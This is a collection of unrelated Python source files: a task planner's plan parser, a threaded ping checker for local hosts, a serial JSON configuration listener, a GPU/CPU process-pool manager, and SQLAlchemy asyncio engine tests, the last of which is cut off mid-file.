                    args = plan[i][5:].split('_')
                    self.plan.append(KitchenAction('am', [int(arg) for arg in args]))
                elif plan[i][0:4] == 'pick':
                    args = plan[i][5:].split('_')
                    self.plan.append(KitchenAction('api', [int(arg) for arg in args]))
                elif plan[i][0:5] == 'place':
                    args = plan[i][6:].split('_')
                    self.plan.append(KitchenAction('apl', [int(arg) for arg in args]))
                elif plan[i][0:10] == 'look_robot':
                    args = plan[i][11:].split('_')
                    self.plan.append(KitchenAction('alr', [int(arg) for arg in args]))
                elif plan[i][0:9] == 'look_hand':
                    args = plan[i][10:].split('_')
                    self.plan.append(KitchenAction('alh', [int(arg) for arg in args]))
                elif plan[i][0:8] == 'look_obj':
                    args = plan[i][9:].split('_')
                    self.plan.append(KitchenAction('alo', [int(arg) for arg in args]))
            # Terminal 'arg' action appended once after parsing.
            # NOTE(review): placement reconstructed from whitespace-stripped
            # source; confirm it is not meant to be inside the loop.
            self.plan.append(KitchenAction('arg'))
        except:
            print "parse_plan exception"
            print out
        #for a in self.plan:
        #print a
    def next_action(self, initial_state, goal_state, prev_obs):
        """Return (next KitchenAction, 1 if a replan happened else 0).

        Replans when there is no plan yet, or when the previous observation
        is missing / 'onone' (a failed observation).
        """
        replanned = False
        # replan
        if self.plan is None or prev_obs is None or prev_obs == 'onone':
            replanned = True
            self.write_input_file(initial_state, goal_state)
            success = False
            #weight = 0.15
            #success = self.run_cmd(10, 0.15)
            #if not success:
            #weight = 0.0
            #success = self.run_cmd(600, 0.0)
            success = self.run_cmd(600, 0.35)
            if not success:
                print "could not make a plan in 10 minutes"
                assert(False)
            #while (success and weight < 0.35):
            #success = self.run_cmd(10, weight + 0.05)
            #weight += 0.05
            #print "done replanning"
        return (self.plan.pop(0), 1 if replanned else 0)
|
ping_thread_basic.py | #!/usr/bin/env python
from threading import Thread
import subprocess
from queue import Queue
num_threads = 3  # number of concurrent ping workers
queue = Queue()  # work queue of IP addresses to ping
ips = ["10.0.1.1", "10.0.1.3", "10.0.1.11", "10.0.1.51"]  # hosts to check
def pinger(i, q):
    """Worker loop: pull IP addresses from the queue forever and ping each once.

    Args:
        i: worker index, used only in log output.
        q: queue.Queue of IP-address strings.
    """
    while True:
        ip = q.get()
        print("Thread %s: Pinging %s" % (i, ip))
        # FIX: pass an argument list with shell=False so the address is never
        # interpreted by a shell, and use subprocess.DEVNULL instead of
        # opening /dev/null by hand (the original leaked one file handle per
        # ping and was not portable).
        ret = subprocess.call(["ping", "-c", "1", ip],
                              stdout=subprocess.DEVNULL,
                              stderr=subprocess.STDOUT)
        if ret == 0:
            print("%s: is alive" % ip)
        else:
            print("%s: did not respond" % ip)
        q.task_done()
# Start the daemon worker pool: each thread pulls addresses from the queue
# and pings them; daemon threads die with the main thread.
for i in range(num_threads):
    worker = Thread(target=pinger, args=(i, queue))
    # FIX: Thread.setDaemon() is deprecated since Python 3.10; set the
    # attribute directly.
    worker.daemon = True
    worker.start()
for ip in ips:
    queue.put(ip)
print("Main Thread Waiting")
# queue.join() blocks until every queued item has been marked task_done().
queue.join()
print("Done")
|
iombian_serial_communication_handler.py | #!/usr/bin/env python3
import json
import logging
import serial
import threading
logger = logging.getLogger(__name__)
class IoMBianSerialConfiguratorHandler():
    """Listens on a serial port for a JSON configuration blob and saves it.

    Bytes are read one at a time; curly-brace depth tracking detects when a
    complete top-level JSON object has arrived, which is then handed to the
    file config handler on a delayed timer.
    """
    # Seconds to wait before handing the parsed config to the file handler.
    SAVE_CONFIG_DELAY = 2
    def __init__(self, file_config_handler, port="/dev/ttyGS0", baudrate=115200, timeout=0.1):
        self.file_config_handler = file_config_handler
        self.port = port          # serial device path
        self.baudrate = baudrate
        self.timeout = timeout    # per-read timeout in seconds
        self.serial_listener_thread = None
        self.listen = False       # loop flag for the listener thread
    def start(self):
        """Start the background listener unless the device is already configured."""
        if self.file_config_handler.execute_command("is_configured"):
            logger.info("Device already configured, Serial Configurator Handler will not be started")
            self.stop()
            return
        logger.debug("Starting Serial Configurator Handler")
        self.listen = True
        self.serial_listener_thread = threading.Thread(target=self.__serial_listener)
        self.serial_listener_thread.start()
    def stop(self):
        """Signal the listener loop to exit and wait for the thread to finish."""
        logger.debug("Stopping Serial Configurator Handler")
        self.listen = False
        if self.serial_listener_thread:
            self.serial_listener_thread.join()
            self.serial_listener_thread = None
    def __serial_listener(self):
        """Thread body: accumulate bytes; parse and save on brace balance 0.

        NOTE(review): each byte is decoded as UTF-8 individually, so a
        multi-byte character would fail to decode and be skipped — fine for
        ASCII JSON; confirm if non-ASCII configs are expected.
        """
        number_of_curly_brackets = 0  # net count of '{' minus '}' seen so far
        config_string = ""
        while self.listen:
            try:
                serial_conn = serial.Serial(port=self.port, baudrate=self.baudrate, timeout=self.timeout)
                logger.info(f"Connection established with serial port: '{self.port}'")
            except serial.serialutil.SerialException as error:
                logger.error(f"Serial port '{self.port}' cannot be found")
                break
            while(self.listen):
                try:
                    data = serial_conn.read()
                except serial.serialutil.SerialException as error:
                    logger.error("Serial exception reading serial connection!")
                    break
                if len(data) == 0:
                    # Read timed out with nothing available; poll again.
                    continue
                try:
                    data_decoded = data.decode('utf-8')
                except:
                    logger.debug(f"Error decoding data as UTF-8: {data}")
                    continue
                if data_decoded == '{':
                    number_of_curly_brackets += 1
                elif data_decoded == '}':
                    number_of_curly_brackets -= 1
                config_string += data_decoded
                if number_of_curly_brackets == 0:
                    # Either a balanced JSON object just completed, or we are
                    # between objects (noise); json.loads rejects the latter.
                    try:
                        config = json.loads(config_string)
                        logger.debug(config)
                        logger.info("New configuration received")
                        # Saving is deferred so the sender can finish cleanly.
                        threading.Timer(self.SAVE_CONFIG_DELAY, self.file_config_handler.execute_command, ["save_config", config]).start()
                    except json.decoder.JSONDecodeError as error:
                        logger.debug("Non valid json string: {}".format(config_string))
                    config_string = ""
            serial_conn.close()
|
process_manager.py | import logging
import queue as queue_lib
import signal
import sys
from multiprocessing import Process, Queue
import GPUtil
from tornado.ioloop import IOLoop
import utils.constants as c
class ProcessManager():
    """A ProcessManager class is used for controlling the multi-processing features of this application.

    A long-lived handler process consumes job dicts from ``self.queue`` and
    spawns one child process per job, routed to a GPU pool or a CPU pool
    depending on device availability.
    """

    def __init__(self):
        """Initialization method.

        Spawns the handler process immediately; jobs are then fed to it
        through :meth:`add_process`.
        """
        # Creates a queue object (shared with the handler process)
        self.queue = Queue()
        # Creates an process object with a specific target
        self.current_process = Process(
            target=self.handle_process, args=(self.queue,), daemon=False)
        # Starts the process
        self.current_process.start()

    def handle_process(self, queue):
        """It handles a new process by calling a specific IOLoop and starting it with a callback.

        Runs inside the child process and blocks forever in ``loop.start()``.

        Args:
            queue (Queue): A queue object.
        """
        # Creates an IOLoop object
        loop = IOLoop()
        # Spawns the callback function
        loop.spawn_callback(self.worker, queue)
        # Starts the loop (blocks)
        loop.start()

    def add_process(self, process):
        """Adds a new process to the queue.

        Args:
            process (Process): A new process to be added to the queue.
        """
        # Puts a new process in the queue
        self.queue.put(process)

    def get_gpu_config(self):
        """Gathers the amount of load and memory that a process should use on the GPU.

        Returns:
            The amount of load and memory that a process should use.
        """
        # Gathers the load per process
        load_per_process = float(c.GPU_MAX_LOAD)
        # Gathers the memory per process
        mem_per_process = float(c.GPU_MAX_MEMORY)
        return load_per_process, mem_per_process

    def get_device(self):
        """Gathers an avaliable GPU or CPU for further processing.

        Returns:
            A configuration object containing the device's information.
        """
        # Tries to check if there is an avaliable GPU
        try:
            # Gathers a list of GPUs
            gpus = GPUtil.getGPUs()
            # For each GPU
            for g in gpus:
                # Logs its information
                logging.info(g.name)
            # Calculates the load and memory per process
            load_per_process, mem_per_process = self.get_gpu_config()
            # Calculates the maximum possible load for an avaliable GPU
            max_load = 1 - load_per_process
            # # Calculates the maximum possible memory for an avaliable GPU
            max_mem = 1 - mem_per_process
            # Gathers the first avaliable GPU
            # NOTE(review): presumably getFirstAvailable raises when no GPU
            # qualifies, which routes execution to the CPU fallback below --
            # confirm against GPUtil docs.
            device_id = GPUtil.getFirstAvailable(
                order='first', maxLoad=max_load, maxMemory=max_mem, attempts=3, interval=3, verbose=False)[0]
            # Checks if the device id exists
            if device_id is not None:
                # Creates a configuration object
                config = {
                    'gpu': {
                        'DEVICE_ID': device_id,
                        'MEMORY_FRACTION': mem_per_process
                    }
                }
                return config
        # If there is no avaliable GPU
        except Exception as e:
            logging.warning(e)
        # Creates a different configuration object
        config = {
            'cpu': {
            }
        }
        return config

    def drain_pool(self, pool):
        """Drains all lingering processes in the pool.

        Args:
            pool (list): The pool itself.

        Returns:
            The drained pool.
        """
        # Creates a new pool
        new_pool = []
        # For every process in the pool
        for p in pool:
            # Checks if the process is alive
            if not p.is_alive():
                # If not, terminates it
                # NOTE(review): terminate() on an already-finished process is
                # a no-op; join() would also reap its exit status.
                p.terminate()
            # If it is alive
            else:
                # Appends the process to the new pool
                new_pool.append(p)
        return new_pool

    async def worker(self, queue):
        """The worker method itself.

        Essentially, it is responsible for draining and adding new processes to the pool.

        Args:
            queue (Queue): A queue object.
        """
        def empty_process_pool(pool):
            """Empties a pool of processes.

            Args:
                pool (list): The pool to be emptied.
            """
            # For every process in the pool
            for p in pool:
                # Terminates the process
                p.terminate()

        def signal_handler(*args):
            """Forces the interruption signal to be intercepted by the main process.
            """
            # Empties the CPU pool
            empty_process_pool(cpu_pool)
            # Empties the GPU pool
            empty_process_pool(gpu_pool)
            logging.warning('Interrupting the process manager ...')
            # Exits the process
            sys.exit()

        # Initialize the job flag as false
        job = False
        # Creates an empty list for the CPU pool
        cpu_pool = []
        # Creates an empty list for the GPU pool
        gpu_pool = []
        # Setting the responsibility of who will receive the interruption signal
        signal.signal(signal.SIGINT, signal_handler)
        # While the loop is true
        while True:
            # Tries to the drain the pools and add a process
            try:
                # Drains the CPU pool
                cpu_pool = self.drain_pool(cpu_pool)
                # Drains the GPU pool
                gpu_pool = self.drain_pool(gpu_pool)
                # Gathers the current job
                # NOTE(review): Queue.get() blocks by default, so the
                # queue_lib.Empty handler below can only fire if a timeout /
                # non-blocking get is intended -- confirm.
                job = queue.get()
                # If the job exists
                if job:
                    # Gathers the processor (job["target"] is a factory callable)
                    processor = job["target"]()
                    # Gathers the device configuration
                    device = self.get_device()
                    # Adds to the job object the device configuration
                    job["data"]["device_config"] = device
                    # If the device configuration is set to the GPU
                    if device.get("gpu"):
                        # Creates the process
                        p = Process(target=processor.consume, name="brainy_gpu-" +
                                    str(len(gpu_pool) + 1), args=(job["data"],), daemon=False)
                        # Starts the process
                        p.start()
                        # Appends the process to the GPU pool
                        gpu_pool.append(p)
                        logging.info('Adding process to GPU pool ...')
                    # If the device configuration is set to the CPU
                    else:
                        # Creates the process
                        p = Process(target=processor.consume, name="brainy_cpu-" +
                                    str(len(cpu_pool) + 1), args=(job["data"],), daemon=False)
                        # Starts the process
                        p.start()
                        # Appends the process to the CPU pool
                        cpu_pool.append(p)
                        logging.info('Adding process to CPU pool ...')
            # Whenever the queue is empty, logs the exception
            except queue_lib.Empty as e:
                logging.warning(e)
|
test_engine_py3k.py | import asyncio
from sqlalchemy import Column
from sqlalchemy import create_engine
from sqlalchemy import delete
from sqlalchemy import event
from sqlalchemy import exc
from sqlalchemy import func
from sqlalchemy import inspect
from sqlalchemy import Integer
from sqlalchemy import select
from sqlalchemy import String
from sqlalchemy import Table
from sqlalchemy import testing
from sqlalchemy import text
from sqlalchemy import union_all
from sqlalchemy.ext.asyncio import async_engine_from_config
from sqlalchemy.ext.asyncio import create_async_engine
from sqlalchemy.ext.asyncio import engine as _async_engine
from sqlalchemy.ext.asyncio import exc as asyncio_exc
from sqlalchemy.ext.asyncio.base import ReversibleProxy
from sqlalchemy.ext.asyncio.engine import AsyncConnection
from sqlalchemy.ext.asyncio.engine import AsyncEngine
from sqlalchemy.pool import AsyncAdaptedQueuePool
from sqlalchemy.testing import assertions
from sqlalchemy.testing import async_test
from sqlalchemy.testing import combinations
from sqlalchemy.testing import config
from sqlalchemy.testing import engines
from sqlalchemy.testing import eq_
from sqlalchemy.testing import expect_raises
from sqlalchemy.testing import expect_raises_message
from sqlalchemy.testing import fixtures
from sqlalchemy.testing import is_
from sqlalchemy.testing import is_false
from sqlalchemy.testing import is_none
from sqlalchemy.testing import is_not
from sqlalchemy.testing import is_true
from sqlalchemy.testing import mock
from sqlalchemy.testing import ne_
from sqlalchemy.util.concurrency import greenlet_spawn
class AsyncFixture:
    """Provides the parametrized ``async_trans_ctx_manager_fixture`` used to
    exercise transaction context-manager behavior across every combination
    of rollback vs. commit, an extra execute after close, and savepoint
    nesting.
    """

    @config.fixture(
        params=[
            (rollback, run_second_execute, begin_nested)
            for rollback in (True, False)
            for run_second_execute in (True, False)
            for begin_nested in (True, False)
        ]
    )
    def async_trans_ctx_manager_fixture(self, request, metadata):
        rollback, run_second_execute, begin_nested = request.param
        from sqlalchemy import Table, Column, Integer, func, select

        t = Table("test", metadata, Column("data", Integer))
        eng = getattr(self, "bind", None) or config.db
        t.create(eng)

        async def run_test(subject, trans_on_subject, execute_on_subject):
            """Drive *subject* (engine or connection) through the
            parametrized transaction scenario, then verify the number of
            rows that were actually committed."""
            async with subject.begin() as trans:
                if begin_nested:
                    if not config.requirements.savepoints.enabled:
                        config.skip_test("savepoints not enabled")
                    if execute_on_subject:
                        nested_trans = subject.begin_nested()
                    else:
                        nested_trans = trans.begin_nested()
                    async with nested_trans:
                        if execute_on_subject:
                            await subject.execute(t.insert(), {"data": 10})
                        else:
                            await trans.execute(t.insert(), {"data": 10})
                        # for nested trans, we always commit/rollback on the
                        # "nested trans" object itself.
                        # only Session(future=False) will affect savepoint
                        # transaction for session.commit/rollback
                        if rollback:
                            await nested_trans.rollback()
                        else:
                            await nested_trans.commit()
                        if run_second_execute:
                            with assertions.expect_raises_message(
                                exc.InvalidRequestError,
                                "Can't operate on closed transaction "
                                "inside context manager. Please complete the "
                                "context manager "
                                "before emitting further commands.",
                            ):
                                if execute_on_subject:
                                    await subject.execute(
                                        t.insert(), {"data": 12}
                                    )
                                else:
                                    await trans.execute(
                                        t.insert(), {"data": 12}
                                    )
                    # outside the nested trans block, but still inside the
                    # transaction block, we can run SQL, and it will be
                    # committed
                    if execute_on_subject:
                        await subject.execute(t.insert(), {"data": 14})
                    else:
                        await trans.execute(t.insert(), {"data": 14})
                else:
                    if execute_on_subject:
                        await subject.execute(t.insert(), {"data": 10})
                    else:
                        await trans.execute(t.insert(), {"data": 10})
                    if trans_on_subject:
                        if rollback:
                            await subject.rollback()
                        else:
                            await subject.commit()
                    else:
                        if rollback:
                            await trans.rollback()
                        else:
                            await trans.commit()
                    if run_second_execute:
                        with assertions.expect_raises_message(
                            exc.InvalidRequestError,
                            "Can't operate on closed transaction inside "
                            "context "
                            "manager. Please complete the context manager "
                            "before emitting further commands.",
                        ):
                            if execute_on_subject:
                                await subject.execute(t.insert(), {"data": 12})
                            else:
                                await trans.execute(t.insert(), {"data": 12})

            expected_committed = 0
            if begin_nested:
                # begin_nested variant, we inserted a row after the nested
                # block
                expected_committed += 1
            if not rollback:
                # not rollback variant, our row inserted in the target
                # block itself would be committed
                expected_committed += 1
            if execute_on_subject:
                eq_(
                    await subject.scalar(select(func.count()).select_from(t)),
                    expected_committed,
                )
            else:
                # BUG FIX: subject.connect() yields an AsyncConnection, which
                # only supports the async context-manager protocol; a plain
                # ``with`` here raised TypeError at runtime.
                async with subject.connect() as conn:
                    eq_(
                        await conn.scalar(select(func.count()).select_from(t)),
                        expected_committed,
                    )

        return run_test
class EngineFixture(AsyncFixture, fixtures.TablesTest):
    """Base fixture supplying an async testing engine plus a seeded ``users``
    table (rows (i, "name<i>") for i in 1..19).
    """

    __requires__ = ("async_dialect",)

    @testing.fixture
    def async_engine(self):
        # transfer_staticpool shares the underlying sync pool with testing.db.
        return engines.testing_engine(asyncio=True, transfer_staticpool=True)

    @classmethod
    def define_tables(cls, metadata):
        """Define the ``users`` table used throughout this test hierarchy."""
        Table(
            "users",
            metadata,
            Column("user_id", Integer, primary_key=True, autoincrement=False),
            Column("user_name", String(20)),
        )

    @classmethod
    def insert_data(cls, connection):
        """Seed 19 rows: user_id 1..19 with matching name<N> values."""
        users = cls.tables.users
        connection.execute(
            users.insert(),
            [{"user_id": i, "user_name": "name%d" % i} for i in range(1, 20)],
        )
class AsyncEngineTest(EngineFixture):
    """Core behavior tests for AsyncEngine / AsyncConnection: proxied
    attributes, equality, transactions, savepoints, invalidation, pooling
    and engine construction."""

    __backend__ = True

    @testing.fails("the failure is the test")
    @async_test
    async def test_we_are_definitely_running_async_tests(self, async_engine):
        async with async_engine.connect() as conn:
            eq_(await conn.scalar(text("select 1")), 2)

    @async_test
    async def test_interrupt_ctxmanager_connection(
        self, async_engine, async_trans_ctx_manager_fixture
    ):
        fn = async_trans_ctx_manager_fixture
        async with async_engine.connect() as conn:
            await fn(conn, trans_on_subject=False, execute_on_subject=True)

    def test_proxied_attrs_engine(self, async_engine):
        sync_engine = async_engine.sync_engine
        is_(async_engine.url, sync_engine.url)
        is_(async_engine.pool, sync_engine.pool)
        is_(async_engine.dialect, sync_engine.dialect)
        eq_(async_engine.name, sync_engine.name)
        eq_(async_engine.driver, sync_engine.driver)
        eq_(async_engine.echo, sync_engine.echo)

    @async_test
    async def test_engine_eq_ne(self, async_engine):
        e2 = _async_engine.AsyncEngine(async_engine.sync_engine)
        e3 = testing.engines.testing_engine(
            asyncio=True, transfer_staticpool=True
        )
        eq_(async_engine, e2)
        ne_(async_engine, e3)
        is_false(async_engine == None)

    @async_test
    @testing.requires.python37
    async def test_no_attach_to_event_loop(self, testing_engine):
        """test #6409"""
        import asyncio
        import threading

        errs = []

        def go():
            loop = asyncio.new_event_loop()
            asyncio.set_event_loop(loop)

            async def main():
                tasks = [task() for _ in range(2)]
                await asyncio.gather(*tasks)
                await engine.dispose()

            async def task():
                async with engine.begin() as connection:
                    result = await connection.execute(select(1))
                    result.all()

            try:
                engine = testing_engine(
                    asyncio=True, transfer_staticpool=False
                )
                asyncio.run(main())
            except Exception as err:
                errs.append(err)

        t = threading.Thread(target=go)
        t.start()
        t.join()
        if errs:
            raise errs[0]

    @async_test
    async def test_connection_info(self, async_engine):
        async with async_engine.connect() as conn:
            conn.info["foo"] = "bar"
            eq_(conn.sync_connection.info, {"foo": "bar"})

    @async_test
    async def test_connection_eq_ne(self, async_engine):
        async with async_engine.connect() as conn:
            c2 = _async_engine.AsyncConnection(
                async_engine, conn.sync_connection
            )
            eq_(conn, c2)
            async with async_engine.connect() as c3:
                ne_(conn, c3)
            is_false(conn == None)

    @async_test
    async def test_transaction_eq_ne(self, async_engine):
        async with async_engine.connect() as conn:
            t1 = await conn.begin()
            t2 = _async_engine.AsyncTransaction._regenerate_proxy_for_target(
                t1._proxied
            )
            eq_(t1, t2)
            is_false(t1 == None)

    def test_clear_compiled_cache(self, async_engine):
        async_engine.sync_engine._compiled_cache["foo"] = "bar"
        eq_(async_engine.sync_engine._compiled_cache["foo"], "bar")
        async_engine.clear_compiled_cache()
        assert "foo" not in async_engine.sync_engine._compiled_cache

    def test_execution_options(self, async_engine):
        a2 = async_engine.execution_options(foo="bar")
        assert isinstance(a2, _async_engine.AsyncEngine)
        eq_(a2.sync_engine._execution_options, {"foo": "bar"})
        eq_(async_engine.sync_engine._execution_options, {})

        """
        attr uri, pool, dialect, engine, name, driver, echo
        methods clear_compiled_cache, update_execution_options,
        execution_options, get_execution_options, dispose
        """

    @async_test
    async def test_proxied_attrs_connection(self, async_engine):
        conn = await async_engine.connect()
        sync_conn = conn.sync_connection
        is_(conn.engine, async_engine)
        is_(conn.closed, sync_conn.closed)
        is_(conn.dialect, async_engine.sync_engine.dialect)
        eq_(conn.default_isolation_level, sync_conn.default_isolation_level)

    @async_test
    async def test_transaction_accessor(self, async_engine):
        async with async_engine.connect() as conn:
            is_none(conn.get_transaction())
            is_false(conn.in_transaction())
            is_false(conn.in_nested_transaction())
            trans = await conn.begin()
            is_true(conn.in_transaction())
            is_false(conn.in_nested_transaction())
            is_(
                trans.sync_transaction, conn.get_transaction().sync_transaction
            )
            nested = await conn.begin_nested()
            is_true(conn.in_transaction())
            is_true(conn.in_nested_transaction())
            is_(
                conn.get_nested_transaction().sync_transaction,
                nested.sync_transaction,
            )
            eq_(conn.get_nested_transaction(), nested)
            is_(
                trans.sync_transaction, conn.get_transaction().sync_transaction
            )
            await nested.commit()
            is_true(conn.in_transaction())
            is_false(conn.in_nested_transaction())
            await trans.rollback()
            is_none(conn.get_transaction())
            is_false(conn.in_transaction())
            is_false(conn.in_nested_transaction())

    @testing.requires.queue_pool
    @async_test
    async def test_invalidate(self, async_engine):
        conn = await async_engine.connect()
        is_(conn.invalidated, False)
        connection_fairy = await conn.get_raw_connection()
        is_(connection_fairy.is_valid, True)
        dbapi_connection = connection_fairy.dbapi_connection
        await conn.invalidate()
        if testing.against("postgresql+asyncpg"):
            assert dbapi_connection._connection.is_closed()
        new_fairy = await conn.get_raw_connection()
        is_not(new_fairy.dbapi_connection, dbapi_connection)
        is_not(new_fairy, connection_fairy)
        is_(new_fairy.is_valid, True)
        is_(connection_fairy.is_valid, False)

    @async_test
    async def test_get_dbapi_connection_raise(self, async_engine):
        conn = await async_engine.connect()
        with testing.expect_raises_message(
            exc.InvalidRequestError,
            "AsyncConnection.connection accessor is not "
            "implemented as the attribute",
        ):
            conn.connection

    @async_test
    async def test_get_raw_connection(self, async_engine):
        conn = await async_engine.connect()
        pooled = await conn.get_raw_connection()
        is_(pooled, conn.sync_connection.connection)

    @async_test
    async def test_isolation_level(self, async_engine):
        conn = await async_engine.connect()
        sync_isolation_level = await greenlet_spawn(
            conn.sync_connection.get_isolation_level
        )
        isolation_level = await conn.get_isolation_level()
        eq_(isolation_level, sync_isolation_level)
        await conn.execution_options(isolation_level="SERIALIZABLE")
        isolation_level = await conn.get_isolation_level()
        eq_(isolation_level, "SERIALIZABLE")
        await conn.close()

    @testing.requires.queue_pool
    @async_test
    async def test_dispose(self, async_engine):
        c1 = await async_engine.connect()
        c2 = await async_engine.connect()
        await c1.close()
        await c2.close()
        p1 = async_engine.pool
        if isinstance(p1, AsyncAdaptedQueuePool):
            eq_(async_engine.pool.checkedin(), 2)
        await async_engine.dispose()
        if isinstance(p1, AsyncAdaptedQueuePool):
            eq_(async_engine.pool.checkedin(), 0)
        is_not(p1, async_engine.pool)

    @testing.requires.independent_connections
    @async_test
    async def test_init_once_concurrency(self, async_engine):
        c1 = async_engine.connect()
        c2 = async_engine.connect()
        # BUG FIX: asyncio.wait() no longer accepts bare awaitables (it
        # requires Tasks since Python 3.11; passing coroutines was deprecated
        # in 3.8).  gather() drives both connect awaitables concurrently.
        await asyncio.gather(c1, c2)

    @async_test
    async def test_connect_ctxmanager(self, async_engine):
        async with async_engine.connect() as conn:
            result = await conn.execute(select(1))
            eq_(result.scalar(), 1)

    @async_test
    async def test_connect_plain(self, async_engine):
        conn = await async_engine.connect()
        try:
            result = await conn.execute(select(1))
            eq_(result.scalar(), 1)
        finally:
            await conn.close()

    @async_test
    async def test_connection_not_started(self, async_engine):
        conn = async_engine.connect()
        testing.assert_raises_message(
            asyncio_exc.AsyncContextNotStarted,
            "AsyncConnection context has not been started and "
            "object has not been awaited.",
            conn.begin,
        )

    @async_test
    async def test_transaction_commit(self, async_engine):
        users = self.tables.users
        async with async_engine.begin() as conn:
            await conn.execute(delete(users))
        async with async_engine.connect() as conn:
            eq_(await conn.scalar(select(func.count(users.c.user_id))), 0)

    @async_test
    async def test_savepoint_rollback_noctx(self, async_engine):
        users = self.tables.users
        async with async_engine.begin() as conn:
            savepoint = await conn.begin_nested()
            await conn.execute(delete(users))
            await savepoint.rollback()
        async with async_engine.connect() as conn:
            eq_(await conn.scalar(select(func.count(users.c.user_id))), 19)

    @async_test
    async def test_savepoint_commit_noctx(self, async_engine):
        users = self.tables.users
        async with async_engine.begin() as conn:
            savepoint = await conn.begin_nested()
            await conn.execute(delete(users))
            await savepoint.commit()
        async with async_engine.connect() as conn:
            eq_(await conn.scalar(select(func.count(users.c.user_id))), 0)

    @async_test
    async def test_transaction_rollback(self, async_engine):
        users = self.tables.users
        async with async_engine.connect() as conn:
            trans = conn.begin()
            await trans.start()
            await conn.execute(delete(users))
            await trans.rollback()
        async with async_engine.connect() as conn:
            eq_(await conn.scalar(select(func.count(users.c.user_id))), 19)

    @async_test
    async def test_conn_transaction_not_started(self, async_engine):
        async with async_engine.connect() as conn:
            trans = conn.begin()
            with expect_raises_message(
                asyncio_exc.AsyncContextNotStarted,
                "AsyncTransaction context has not been started "
                "and object has not been awaited.",
            ):
                await trans.rollback(),

    @testing.requires.queue_pool
    @async_test
    async def test_pool_exhausted_some_timeout(self, async_engine):
        engine = create_async_engine(
            testing.db.url,
            pool_size=1,
            max_overflow=0,
            pool_timeout=0.1,
        )
        async with engine.connect():
            with expect_raises(exc.TimeoutError):
                await engine.connect()

    @testing.requires.queue_pool
    @async_test
    async def test_pool_exhausted_no_timeout(self, async_engine):
        engine = create_async_engine(
            testing.db.url,
            pool_size=1,
            max_overflow=0,
            pool_timeout=0,
        )
        async with engine.connect():
            with expect_raises(exc.TimeoutError):
                await engine.connect()

    @async_test
    async def test_create_async_engine_server_side_cursor(self, async_engine):
        testing.assert_raises_message(
            asyncio_exc.AsyncMethodRequired,
            "Can't set server_side_cursors for async engine globally",
            create_async_engine,
            testing.db.url,
            server_side_cursors=True,
        )

    def test_async_engine_from_config(self):
        config = {
            "sqlalchemy.url": str(testing.db.url),
            "sqlalchemy.echo": "true",
        }
        engine = async_engine_from_config(config)
        assert engine.url == testing.db.url
        assert engine.echo is True
        assert engine.dialect.is_async is True
class AsyncEventTest(EngineFixture):
    """The engine events all run in their normal synchronous context.

    we do not provide an asyncio event interface at this time.
    """

    __backend__ = True

    @async_test
    async def test_no_async_listeners(self, async_engine):
        # Listening directly on the async facade objects must be rejected.
        with testing.expect_raises_message(
            NotImplementedError,
            "asynchronous events are not implemented "
            "at this time. Apply synchronous listeners to the "
            "AsyncEngine.sync_engine or "
            "AsyncConnection.sync_connection attributes.",
        ):
            event.listen(async_engine, "before_cursor_execute", mock.Mock())
        conn = await async_engine.connect()
        with testing.expect_raises_message(
            NotImplementedError,
            "asynchronous events are not implemented "
            "at this time. Apply synchronous listeners to the "
            "AsyncEngine.sync_engine or "
            "AsyncConnection.sync_connection attributes.",
        ):
            event.listen(conn, "before_cursor_execute", mock.Mock())

    @async_test
    async def test_sync_before_cursor_execute_engine(self, async_engine):
        # Listener registered on sync_engine before connecting still fires.
        canary = mock.Mock()
        event.listen(async_engine.sync_engine, "before_cursor_execute", canary)
        async with async_engine.connect() as conn:
            sync_conn = conn.sync_connection
            await conn.execute(text("select 1"))
        eq_(
            canary.mock_calls,
            [mock.call(sync_conn, mock.ANY, "select 1", (), mock.ANY, False)],
        )

    @async_test
    async def test_sync_before_cursor_execute_connection(self, async_engine):
        # Listener registered after the connection exists also fires.
        canary = mock.Mock()
        async with async_engine.connect() as conn:
            sync_conn = conn.sync_connection
            event.listen(
                async_engine.sync_engine, "before_cursor_execute", canary
            )
            await conn.execute(text("select 1"))
        eq_(
            canary.mock_calls,
            [mock.call(sync_conn, mock.ANY, "select 1", (), mock.ANY, False)],
        )

    @async_test
    async def test_event_on_sync_connection(self, async_engine):
        # A per-connection sync listener receives the "begin" event.
        canary = mock.Mock()
        async with async_engine.connect() as conn:
            event.listen(conn.sync_connection, "begin", canary)
            async with conn.begin():
                eq_(
                    canary.mock_calls,
                    [mock.call(conn.sync_connection)],
                )
class AsyncInspection(EngineFixture):
    """inspect() is explicitly unsupported on the async facade objects."""

    __backend__ = True

    @async_test
    async def test_inspect_engine(self, async_engine):
        with testing.expect_raises_message(
            exc.NoInspectionAvailable,
            "Inspection on an AsyncEngine is currently not supported.",
        ):
            inspect(async_engine)

    @async_test
    async def test_inspect_connection(self, async_engine):
        async with async_engine.connect() as conn:
            with testing.expect_raises_message(
                exc.NoInspectionAvailable,
                "Inspection on an AsyncConnection is currently not supported.",
            ):
                inspect(conn)
class AsyncResultTest(EngineFixture):
    """Streaming result behavior (``conn.stream`` / ``stream_scalars``),
    parametrized over the plain / ``scalars()`` / ``mappings()`` filters
    against the 19-row ``users`` fixture table.
    """

    @testing.combinations(
        (None,), ("scalars",), ("mappings",), argnames="filter_"
    )
    @async_test
    async def test_all(self, async_engine, filter_):
        users = self.tables.users
        async with async_engine.connect() as conn:
            result = await conn.stream(select(users))
            if filter_ == "mappings":
                result = result.mappings()
            elif filter_ == "scalars":
                # scalars(1) selects the second column (user_name)
                result = result.scalars(1)
            all_ = await result.all()
            if filter_ == "mappings":
                eq_(
                    all_,
                    [
                        {"user_id": i, "user_name": "name%d" % i}
                        for i in range(1, 20)
                    ],
                )
            elif filter_ == "scalars":
                eq_(
                    all_,
                    ["name%d" % i for i in range(1, 20)],
                )
            else:
                eq_(all_, [(i, "name%d" % i) for i in range(1, 20)])

    @testing.combinations(
        (None,), ("scalars",), ("mappings",), argnames="filter_"
    )
    @async_test
    async def test_aiter(self, async_engine, filter_):
        users = self.tables.users
        async with async_engine.connect() as conn:
            result = await conn.stream(select(users))
            if filter_ == "mappings":
                result = result.mappings()
            elif filter_ == "scalars":
                result = result.scalars(1)
            rows = []
            # async-iteration protocol over the streaming result
            async for row in result:
                rows.append(row)
            if filter_ == "mappings":
                eq_(
                    rows,
                    [
                        {"user_id": i, "user_name": "name%d" % i}
                        for i in range(1, 20)
                    ],
                )
            elif filter_ == "scalars":
                eq_(
                    rows,
                    ["name%d" % i for i in range(1, 20)],
                )
            else:
                eq_(rows, [(i, "name%d" % i) for i in range(1, 20)])

    @testing.combinations((None,), ("mappings",), argnames="filter_")
    @async_test
